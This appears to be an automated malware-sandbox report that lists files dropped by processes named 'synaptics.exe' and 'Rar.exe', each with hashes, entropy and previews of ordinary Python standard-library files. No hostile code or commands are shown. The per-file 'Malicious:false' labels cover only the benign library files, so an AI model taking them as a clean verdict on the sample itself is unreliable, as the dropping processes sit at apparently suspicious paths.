                                                                                                                                                                                      MD5:ED7096D7B9E7FB6E5392AD893D8540B4
                                                                                                                                                                                      SHA1:63904A501EC62F5DC818C137906566C23FC0B503
                                                                                                                                                                                      SHA-256:F4347E75E46BF3EEAD0EE408D916F5DD9BFACACD003CBCA478D188A6B3F576BF
                                                                                                                                                                                      SHA-512:E155D58B184B06861688A460FC67FCD3FD8E07E3251A2175A72A80B77E85D305CC792900B2F41880064198FFF96323589772E4762C45ED1B761D4CEB1EF45197
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....3C:\Users\Public\QExvbmVOb25l\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15895
                                                                                                                                                                                      Entropy (8bit):5.335194926314186
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QoMRQLVaCuoN1r9u1u2RTCQzweSkqxo5IbeX6EoV:QoMoVh9u1d9wqpIbQBoV
                                                                                                                                                                                      MD5:93FF873A646B4442F31F836CBAF8035A
                                                                                                                                                                                      SHA1:439C0B30D378DF9A3D8908950582D010F062770D
                                                                                                                                                                                      SHA-256:E805E9E422A7CFA8180B21F4D6E9755C510C8C0F78D9D7DD3F682A600BDD9B30
                                                                                                                                                                                      SHA-512:1A5AC9BF432D6F03CE6DC80758C841A02CBA8748CEEF78951BCC9216FCC77544B50B062B3B619E27E297874FF197743144027C68EC0364752053F9285B0AF2A3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dwH.......................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k.rJe.d.e.e.....e.j.d.k.rUd.d.l.m.Z...e.Z.e.j.d.k.rqe.j.d.k.rqe.e.....j...d...d.....d.k.rqe.Z.d.d.l.m.Z m!Z"m#Z$m%Z&..d}d.d...Z'd}d.d...Z(i.Z)d.d...Z*e.j.d.k.r.d.d.l.m+Z,..d.d.l.m-Z...i.Z/d.d...Z0e0j.r.e*j..1d.d...e0_.n.e.j.d.k.r.d.d.l.m2Z,..d.d.l.m3Z3m4Z4m5Z5m6Z6m7Z7..d.d.l.m8Z8m9Z9..d.d l.m:Z:..d}d!d"..Z;G.d#d$..d$e:..Z<e;e<d%....G.d&d'..d'e:..Z=e;e=....G.d(d)..d)e:..Z>e;e>....G.d*d+..d+e:..Z?e;e?....G.d,d-..d-e:..Z@e;e@....e.d...e.d/..k...r'e?ZAe@ZBn.G.d0d1..d1e:..ZAe;eA....G.d2d3..d3e:..ZBe;eB....G.d4d5..d5e:..ZCe;eC....G.d6d7..d7e:..ZDe;eD....G.d8d9..d9e:..ZEe3eE..e3eD..k...rjeDZEe.d/..e.d:..k...rxe?ZFe@ZGn.G.d;d<..d<e:..ZFe;eF....G.d=d>..d>e:..ZGe;eG....G.d?d@..d@e:..ZHeH..eH_IeH_Je;eH....G.dAdB..dBe:..ZKeK..eK_IeK_Je;eK....G.dCdD..dDe:..ZLeL..eL_IeL_Je;eL....G.dEdF..dFe:..ZMe;eMd%....G.dGdH..dHe:..ZNeNZO
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1914
                                                                                                                                                                                      Entropy (8bit):5.217988533253076
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:v7p1APBJ0tfAE4yxn4rX4kbruu/fdq7RvRhPAEV5wq:l6r0OhyuLtV1qRoEV9
                                                                                                                                                                                      MD5:B0F649A78E4D6B1EFF1431689B8BEAD6
                                                                                                                                                                                      SHA1:1DE2B0406F2EAFB7A4A92589861DFEB236311E1B
                                                                                                                                                                                      SHA-256:13F8D900754927F4EB07E5F92BFFD3821156376E2171BA9DB9F4BA8A69E76E23
                                                                                                                                                                                      SHA-512:69D888A89EA7FD1CD7153546E1B5FF59C0975682E4899010065450069758F9091C2BC287A9477221C61CF1995C58B0FD9CBC20C3D5EB765FFA27CD8EB6584C3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.T.e.e...Z.d.d...Z.G.d.d...d.e.e.....Z.e.j.d.k.r/d.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.j.d.k.rDd.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.d.....)......N)...*c....................C...sH...t.|.t...r.t.|.t...S.t.|.t...r.t.|.j...|.j...S.t.|.t...r.|.S.t.d.|.......).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance.._array_type.._other_endian.._type_Z._length_..issubclass..Structure..TypeError)...typ..r.....2C:\Users\Public\QExvbmVOb25l\lib\ctypes\_endian.pyr........s..................r....c........................s....e.Z.d.Z...f.d.d...Z.....Z.S.)..._swapped_metac........................s^...|.d.k.r&g.}.|.D.].}.|.d...}.|.d...}.|.d.d.....}.|...|.t.|...f.|.......q.|.}.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8325
                                                                                                                                                                                      Entropy (8bit):5.4800871510315226
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:s+G6LCXBDrl73zbXCL3mm0LGuZ7Iv0nwMXwDRi4qzDj:sloiDp7Do0LGutnwMXExqzDj
                                                                                                                                                                                      MD5:DB18EDF9EDBAE3DD2D37622EB7DFCE11
                                                                                                                                                                                      SHA1:78BA33E629B8D95B6007A5BD8EA039D6B45FE3EB
                                                                                                                                                                                      SHA-256:177EB52C4C4F37BC7F01099B0DCD39FE605D63B331641AF76BD17FD74A5509BF
                                                                                                                                                                                      SHA-512:FF1E36AB1F024F0DF6BDA2C60E6C2BBBADCDA9A48C6D17F640BAC2443263FDA974CF29F43AA177B5F7C91A210430894B215582E53637303FD531AA817EE56C3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.7.......................@...s@...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d.k.r"d.d...Z.d.d...Z.d.d...Z.noe.j.d.k.r7e.j.d.k.r7d.d.l.m.Z...d.d...Z.nZe.j...d...rDd.d.l.m.Z...nMe.j.d.k.r.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.j.d.k.rcd.d...Z.n.d.d...Z.e.j...d...rvd.d...Z.d.d...Z.n.e.j.d.k.r.d.d...Z.d'd.d...Z.n.d.d ..Z.d!d"..Z.d#d...Z.d$d%..Z.e.d&k.r.e.....d.S.d.S.)(.....N..ntc....................C...s....d.}.t.j...|...}.|.d.k.r.d.S.|.t.|.....}.t.j.|.d.......d.d...\.}.}.t.|.d.d.......d...}.|.d.k.r3|.d.7.}.t.|.d.d.......d...}.|.d.k.rCd.}.|.d.k.rK|.|...S.d.S.).z.Return the version of MSVC that was used to build Python... For Python 2.3 and up, the version number is included in. sys.version. For earlier versions, assume the compiler is MSVC 6.. z.MSC v...........N.. .........................g......$@r....)...sys..version..find..len..split..int)...prefix..i..s..restZ.majorVersionZ.minorVersion..r...../C:\Users\Public\QExvbmVOb25l\lib\ctypes\util.py.._get_build_version.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4871
                                                                                                                                                                                      Entropy (8bit):5.545621791282772
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:0n7SgQvVTrUEp2DHdwyeOXd97wUah1VWyGPTYPrVgI+AxROhOFPN:0n6VTAEp2DH+yZXjw7h1VWJSZe2N
                                                                                                                                                                                      MD5:28F52ADCEE0136686A3583CE740D09FA
                                                                                                                                                                                      SHA1:D4A13B70CB8A3417684AEA45ABC0C9577EEAC2F7
                                                                                                                                                                                      SHA-256:05B71A0C0D64AE7E01D6C436C00372B10B3475D2ABC3B30FA823A192475FBF1D
                                                                                                                                                                                      SHA-512:C3BF80F25B9421131AB8A0A57ED4E357766314AB946F77989BF26B88BF37B4C34C039C636AE5E33A203AE7B4DFBBB59F07E65881FCB408D53B9667D6DF90DA12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j...Z.Z.e.j ..Z!Z"e.j#..Z$..Z%Z&e.j#..Z'Z(e.j)..Z*Z+e.j,..Z-Z.e../e.j...e../e.j,..k.rle.j.Z0e.j.Z1n.e../e.j...e../e.j,..k.r~e.j Z0e.j.Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.j,Z8e8Z9e8Z:e8Z;e8Z<e8Z=e8Z>e8Z?e8Z@e8ZAe8ZBe8ZCe8ZDe8ZEe8ZFe8ZGe8ZHe8ZIe8ZJe8ZKe8ZLe8ZMe8ZNe8ZOe8ZPe8ZQe8ZRe8ZSe8ZTe8ZUe8ZVe8ZWG.d.d...d.e.jX..ZYeY..ZZ..Z[Z\G.d.d...d.e.jX..Z]e]Z^G.d.d...d.e.jX..Z_G.d.d...d.e.jX..Z`e`..Za..ZbZcG.d.d...d.e.jX..Zded..ZeZfd.d...ZgG.d.d...d.e.jX..ZhehZiG.d.d...d.e.jX..ZjejZkd.ZlG.d.d...d.e.jX..ZmG.d.d...d.e.jX..Zne..oe.....ZpZqe..oe...Zre..oe.....ZsZte..oe...Zue..oe4..Zve..oe.....ZwZxe..oeh....ZyZze..oe...Z{e..oe8....Z|Z}e..oeG..Z~e..oeH..Z.e..oe.....Z.Z.e..oe...Z.e..oe7..Z.e..oe.....Z.Z.e..oej....Z.Z.e..oe`....Z.Z.e..oec..Z.e..oeY....Z.Z.e..oe\....Z.Z.e..oeV..Z.e..oe...Z.e..oed....Z.Z.e..oef....Z.Z.e..oe^..Z.e..oe.....Z.Z.e..oe"..Z.e..o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):90610
                                                                                                                                                                                      Entropy (8bit):4.496267695360937
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:2UIQYbeLycfOz9BFqOPRlQ39heBzF2B112wHY5:2UIQYSxfOzUOPDm0Bua+C
                                                                                                                                                                                      MD5:B5F6D238CA79D8E5D3AAE5257EC3CE47
                                                                                                                                                                                      SHA1:19F628431FE6CC65407C2457324F8CCD51B385BF
                                                                                                                                                                                      SHA-256:E52A488B10C34E4D7C09740D2BFE2876C5AD6768FFDB66D8582224E55376B67B
                                                                                                                                                                                      SHA-512:B7CD3C2D46D93C0E096F9231106951EEF265A29D7212DAFCBF8EEBA79BF768D88AC683BEAD312C0A5E9498CA8356E91AB93E029D6F6B1B217548D6C8E4A5FF18
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Concrete date/time and related types.....See http://www.iana.org/time-zones/repository/tz-link.html for..time zone and DST data sources..."""....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR")......import time as _time..import math as _math..import sys..from operator import index as _index....def _cmp(x, y):.. return 0 if x == y else 1 if x > y else -1....MINYEAR = 1..MAXYEAR = 9999.._MAXORDINAL = 3652059 # date.max.toordinal()....# Utility functions, adapted from Python's Demo/classes/Dates.py, which..# also assumes the current Gregorian calendar indefinitely extended in..# both directions. Difference: Dates.py calls January 1 of year 0 day..# number 1. The code here calls January 1 of year 1 day number 1. This is..# to match the definition of the "proleptic Gregorian" calendar in Dershowitz..# and Reingold's "Calendrical Calculations", where it's the base calendar..# for all computations. See the book for algorit
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6028
                                                                                                                                                                                      Entropy (8bit):4.43522803289218
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Y0Z6om2P6kXGyFQBEIA7FZKOYS8QYG6mV49ZlUNhNtbPFXPl0lWtEU:jN1ikXGgQ+77FZVJlV8lwr95PZtT
                                                                                                                                                                                      MD5:AAA7BF10D5BB5125CD6A9F6584EFDFBD
                                                                                                                                                                                      SHA1:E2DDC2C9069BF1394F5BB930A636A69E2F114B8B
                                                                                                                                                                                      SHA-256:31CCB3572790579F00A99D0E76513E43F1554D8E72BE2B83C4795427F24885B2
                                                                                                                                                                                      SHA-512:91EDF7E2E6FC44462F53C2EBD8F4CEE535298034DA5656959DC00C8B1FF3F90C8FC08B4B148BA4E3E8EEF9E2F77DE77F7ECF2250ABAE70AE574E5981176782F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Generic interface to all dbm clones.....Use.... import dbm.. d = dbm.open(file, 'w', 0o666)....The returned object is a dbm.gnu, dbm.ndbm or dbm.dumb object, dependent on the..type of database being opened (determined by the whichdb function) in the case..of an existing dbm. If the dbm does not exist and the create or new flag ('c'..or 'n') was specified, the dbm type will be determined by the availability of..the modules (tested in the above order).....It has the following interface (key and data are strings):.... d[key] = data # store data at key (may override data at.. # existing key).. data = d[key] # retrieve data at key (raise KeyError if no.. # such key).. del d[key] # delete data stored at key (raises KeyError.. # if no such key).. flag = key in d # true if the key exists.. list = d.keys() # return a list of all existing keys (slow!)....Future versio
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11852
                                                                                                                                                                                      Entropy (8bit):4.456406302245384
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:LyENNkKga8J8/o/LMwRU0hY9uD+g80U/RT18/e3n33M3qNcR4:LYaKMyhce4
                                                                                                                                                                                      MD5:90265924B0CF9D1E3A0EF2BB2D549CE2
                                                                                                                                                                                      SHA1:7E53DFC0CC4E6923C2EEF405631364C8754605FB
                                                                                                                                                                                      SHA-256:96FC314ECD5EA6344FB016F3631D8013B214627D30B5AB19C21D1D6D35C5306A
                                                                                                                                                                                      SHA-512:9A2A5E08CB8976F84DBA28A59FF1B132F60597D3C9499B33A5E0DA6A193F63339DD468B7223545BFC7B20B248C520739D4C6BBD86451262FE2A51D7A5D7F0160
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A dumb and slow but simple dbm clone.....For database spam, spam.dir contains the index (a text file),..spam.bak *may* contain a backup of the index (also a text file),..while spam.dat contains the data (a binary file).....XXX TO DO:....- seems to contain a bug when updating.......- reclaim free space (currently, space once occupied by deleted or expanded..items is never reused)....- support concurrent access (currently, if two processes take turns making..updates, they can mess up the index)....- support efficient access to large databases (currently, the whole index..is read when the database is opened, and some updates rewrite the whole index)....- support opening for read-only (flag = 'm')...."""....import ast as _ast..import io as _io..import os as _os..import collections.abc....__all__ = ["error", "open"]...._BLOCKSIZE = 512....error = OSError....class _Database(collections.abc.MutableMapping):.... # The on-disk directory and data files can remain in mutually.. # inconsi
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):75
                                                                                                                                                                                      Entropy (8bit):4.301891945228928
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:OAArkHIF3BcTxIxPjZ6CH4JgBiv:OlIQBdx9mgBM
                                                                                                                                                                                      MD5:49B75CF4D832E5DB5BFE4537C5332188
                                                                                                                                                                                      SHA1:2EB4AA2CC6539F68E5A42590919F97CF02B47F24
                                                                                                                                                                                      SHA-256:98DCF3E73DC56C7DBF013852F685EAC1FE3A911785E682AB69836EBA5656C142
                                                                                                                                                                                      SHA-512:AD5DF52AD3AEF6D44F23D934CD3DE15E7D1BA4900FDE2E70C21009B074C718A47ECFEFA2B14B2FE9462B7DC0BBA8C5371236CA926704A0FD21DEC0FF4D1B450B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Provide the _gdbm module as a dbm submodule."""....from _gdbm import *..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):73
                                                                                                                                                                                      Entropy (8bit):4.237502560318079
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:OAArb0cTxIxPjZ6xxBiv:OlUdx98xBM
                                                                                                                                                                                      MD5:5967B257F3143A915F76FA1F4494E989
                                                                                                                                                                                      SHA1:BD1C90535C5926383AE4B6D02936AB96A147AE92
                                                                                                                                                                                      SHA-256:D747238751AA697D7040EE1479E0C3EFF0172E1195825061CF517CF9BEF30050
                                                                                                                                                                                      SHA-512:B6DB12A07B47BB2D034354B81CF4EDEC4E7F1305DE222FC7E68F14AB290F12F9F576D7BB4EFF138186E1B6DED2168882A79447EA1BCFDD3ED5C19869503EEBD9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Provide the _dbm module as a dbm submodule."""....from _dbm import *..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                      Entropy (8bit):4.098213504925523
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:DoJ2xToJ2xpdOWoJ2x7EdMoJ2xhVfwRpLXGFJ2xTFJ2xpdOWFJ2x7EdMFJ2xhVfv:E4xU4xpdg4xgdN4xhVfYRW4xR4xpdt4E
                                                                                                                                                                                      MD5:19468B7C81C8C73F6B37DE1BE745672C
                                                                                                                                                                                      SHA1:1877E11D665B90BCEBED2341A6806DCBC62FB499
                                                                                                                                                                                      SHA-256:F205D8DC95D81B5D2B59362CBE0E385CFEEB98C14A70971F3372BE1403378B03
                                                                                                                                                                                      SHA-512:3D129FA184C46A8B8D77D235946875DA7543EE964E1FEEC5986C3816EA9A4D023F3A71A3EBDA9D6539CF7F561C8E0D8F9749B9CB3310B84B16391642A5E7CD2A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..try:.. from _decimal import *.. from _decimal import __doc__.. from _decimal import __version__.. from _decimal import __libmpdec_version__..except ImportError:.. from _pydecimal import *.. from _pydecimal import __doc__.. from _pydecimal import __version__.. from _pydecimal import __libmpdec_version__..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):85364
                                                                                                                                                                                      Entropy (8bit):4.512246773776763
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:PxMUIKEi9FINTaSyEJH7/7Jh1rHww2FJQppY5VbhCAMqRCKM8g6S8/2wUcZ:vIBqqY5VbhCAM+CKM8FS8/VZ
                                                                                                                                                                                      MD5:FF9CBAADC1B0F414B2627CE5F761AB8E
                                                                                                                                                                                      SHA1:8ED742A47D1C009E2789328C2AD2DF72D3788B7F
                                                                                                                                                                                      SHA-256:F517AE2F8750BD8A1C7A2F5BB14310CA2D961B7402AF7A8AB256EF75C91769B6
                                                                                                                                                                                      SHA-512:191349E29C43C528D9246607189E6F8D740134121A46EF96E94C0A51C441EEC8D47C05DFDC53E33294EF35B35BD7153A3DDA7B5DBF1A41F9FA4F6309D3D5CCD6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Module difflib -- helpers for computing deltas between objects.....Function get_close_matches(word, possibilities, n=3, cutoff=0.6):.. Use SequenceMatcher to return list of the best "good enough" matches.....Function context_diff(a, b):.. For two lists of strings, return a delta in context diff format.....Function ndiff(a, b):.. Return a delta: the difference between `a` and `b` (lists of strings).....Function restore(delta, which):.. Return one of the two sequences that generated an ndiff delta.....Function unified_diff(a, b):.. For two lists of strings, return a delta in unified diff format.....Class SequenceMatcher:.. A flexible class for comparing pairs of sequences of any type.....Class Differ:.. For producing human-readable deltas from sequences of lines of text.....Class HtmlDiff:.. For producing HTML side by side comparison with change highlights..."""....__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',.. 'Differ','IS
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20560
                                                                                                                                                                                      Entropy (8bit):4.531273573237088
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0Gvbyi+sLuRyATo/3uMzm3FQ1R9tAvmDjOJOA:0Gvby6uwBzm3FQ1D6vmDjOoA
                                                                                                                                                                                      MD5:629C132558A9EC0AADDA6B3568285463
                                                                                                                                                                                      SHA1:2E4614EC3EA4943F55562B1BD10E460EF73CF310
                                                                                                                                                                                      SHA-256:3DF71EEE06EF515D91204CB4A2AE9C0946C968473C51D2D902C82FB2B62BEA2E
                                                                                                                                                                                      SHA-512:44E928B67353078A8B486DA58E6ECC91049A1B40B2D5EA0FE3C5018C028BDB4F13B41E25E1B99D8CB0AFA29A66CE348F899773A8805BC76A17C1B599B7879155
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Disassembler of Python byte code into mnemonics."""....import sys..import types..import collections..import io....from opcode import *..from opcode import __all__ as _opcodes_all....__all__ = ["code_info", "dis", "disassemble", "distb", "disco",.. "findlinestarts", "findlabels", "show_code",.. "get_instructions", "Instruction", "Bytecode"] + _opcodes_all..del _opcodes_all...._have_code = (types.MethodType, types.FunctionType, types.CodeType,.. classmethod, staticmethod, type)....FORMAT_VALUE = opmap['FORMAT_VALUE']..FORMAT_VALUE_CONVERTERS = (.. (None, ''),.. (str, 'str'),.. (repr, 'repr'),.. (ascii, 'ascii'),..)..MAKE_FUNCTION = opmap['MAKE_FUNCTION']..MAKE_FUNCTION_FLAGS = ('defaults', 'kwdefaults', 'annotations', 'closure')......def _try_compile(source, name):.. """Attempts to compile the given source, first as an expression and.. then as a statement if the first approach fails..... Utility function to accept strings in
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):107953
                                                                                                                                                                                      Entropy (8bit):4.560169703474059
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:kELdb9WiDz1eFhoeYsioJT0T+0GNC9sjQeOEx9VUaHsez20T+28:bdb9WiDz1eFhFYsioJT0T+0GNC9sjQee
                                                                                                                                                                                      MD5:F568FFB0098065BC1CDFFA226D00C81E
                                                                                                                                                                                      SHA1:7ACB808E8F5B7B72197A71DE0880C1DFD39F563A
                                                                                                                                                                                      SHA-256:9DA24E3793F13F188F6150D6DFAF36AC2E20BFD76E70AECFB2136A8FF350D993
                                                                                                                                                                                      SHA-512:22431867A30D5F33026C764CC6573F8723B72B305FB327B7FDEAB53580ECC999F1D7AC0AC1521111700BB335DBEF708A4363ED744EAF8AA6C5CFF0AF21B62C4C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Module doctest...# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org)...# Major enhancements and refactoring by:..# Jim Fulton..# Edward Loper....# Provided as-is; use at your own risk; no warranty; no promises; enjoy!....r"""Module doctest -- a framework for running examples in docstrings.....In simplest use, end each module M to be tested with:....def _test():.. import doctest.. doctest.testmod()....if __name__ == "__main__":.. _test()....Then running the module as a script will cause the examples in the..docstrings to get executed and verified:....python M.py....This won't display anything unless an example fails, in which case the..failing example(s) and the cause(s) of the failure(s) are printed to stdout..(why not stderr? because stderr is a lame hack <0.2 wink>), and the final..line of output is "Test failed.".....Run it with the -v switch instead:....python M.py -v....and a detailed report of all examples tried is printed to stdout, alo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1828
                                                                                                                                                                                      Entropy (8bit):4.659617027776494
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2XvNh6MGDFchDSvkvxnsj/axPSLxnsbXqxP0:2Xlh6M/DxnsjuPSlnsbXGP0
                                                                                                                                                                                      MD5:4A5BEB56533BF0D8B94EE640F866E491
                                                                                                                                                                                      SHA1:44497180DE35656486799BC533DE4EAAF3C3EE2C
                                                                                                                                                                                      SHA-256:AF3DD99D5C82FA7E75A653B813A592A92CF453EBC4226FB330CD47E560395426
                                                                                                                                                                                      SHA-512:06D65E564E593489F4D49D8EAB35936B829913DB1898B25AEC2532C42BCBE1A1450248F98972119349DC1FD17337AB48F9B4749075195E763ABDFD8F430A4AF2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""A package for parsing, handling, and generating email messages."""....__all__ = [.. 'base64mime',.. 'charset',.. 'encoders',.. 'errors',.. 'feedparser',.. 'generator',.. 'header',.. 'iterators',.. 'message',.. 'message_from_file',.. 'message_from_binary_file',.. 'message_from_string',.. 'message_from_bytes',.. 'mime',.. 'parser',.. 'quoprimime',.. 'utils',.. ].........# Some convenience routines. Don't import Parser and Message as side-effects..# of importing email since those cascadingly import most of the rest of the..# email package...def message_from_string(s, *args, **kws):.. """Parse a string into a Message object model..... Optional _class and strict are passed to the Parser constructor... """.. from email.parser import Parser.. return Parser(*args, **kws).parsestr(s)....def message_from_bytes(s,
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1573
                                                                                                                                                                                      Entropy (8bit):4.9094289530923545
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:wwQTrfch6OD9tLNoVThNVAH4N6rqNkh8O:wprfch6OloBLWo6rWk+O
